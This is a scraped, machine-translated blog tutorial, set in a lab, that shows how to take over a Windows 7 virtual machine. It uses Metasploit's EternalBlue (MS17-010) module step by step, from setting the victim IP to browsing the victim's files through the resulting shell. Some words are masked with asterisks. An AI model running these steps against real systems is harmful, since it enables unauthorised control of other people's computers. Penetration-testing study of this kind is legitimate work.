当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive 


Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- 如何将数据变成资产?吸引数据科学家
- C language 100 question set 004 - statistics of the number of people of all ages
- Basic principle and application of iptables
- X Window System介紹
- Computer TCP / IP interview 10 even asked, how many can you withstand?
- (2)ASP.NET Core3.1 Ocelot路由
- Group count - word length
- 车的换道检测
- Chainlink将美国选举结果带入区块链 - Everipedia
- This article will introduce you to jest unit test
猜你喜欢

Elasticsearch database | elasticsearch-7.5.0 application construction

基于深度学习的推荐系统

Computer TCP / IP interview 10 even asked, how many can you withstand?

Troubleshooting and summary of JVM Metaspace memory overflow

ipfs正舵者Filecoin落地正当时 FIL币价格破千来了

This article will introduce you to jest unit test

数据产品不就是报表吗?大错特错!这分类里有大学问

阿里云Q2营收破纪录背后,云的打开方式正在重塑

选择站群服务器的有哪些标准呢?

Existence judgment in structured data
随机推荐
读取、创建和运行多个文件的3个Python技巧
嘘!异步事件这样用真的好么?
直播预告 | 微服务架构学习系列直播第三期
ipfs正舵者Filecoin落地正当时 FIL币价格破千来了
通过深层神经网络生成音乐
Subordination judgment in structured data
2018中国云厂商TOP5:阿里云、腾讯云、AWS、电信、联通 ...
hadoop 命令总结
(2)ASP.NET Core3.1 Ocelot路由
JetCache埋点的骚操作,不服不行啊
Analysis of ThreadLocal principle
在大规模 Kubernetes 集群上实现高 SLO 的方法
Examples of unconventional aggregation
After brushing leetcode's linked list topic, I found a secret!
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
Using Es5 to realize the class of ES6
Cos start source code and creator
Ubuntu18.04上安裝NS-3
Swagger 3.0 天天刷屏,真的香嗎?
快快使用ModelArts,零基礎小白也能玩轉AI!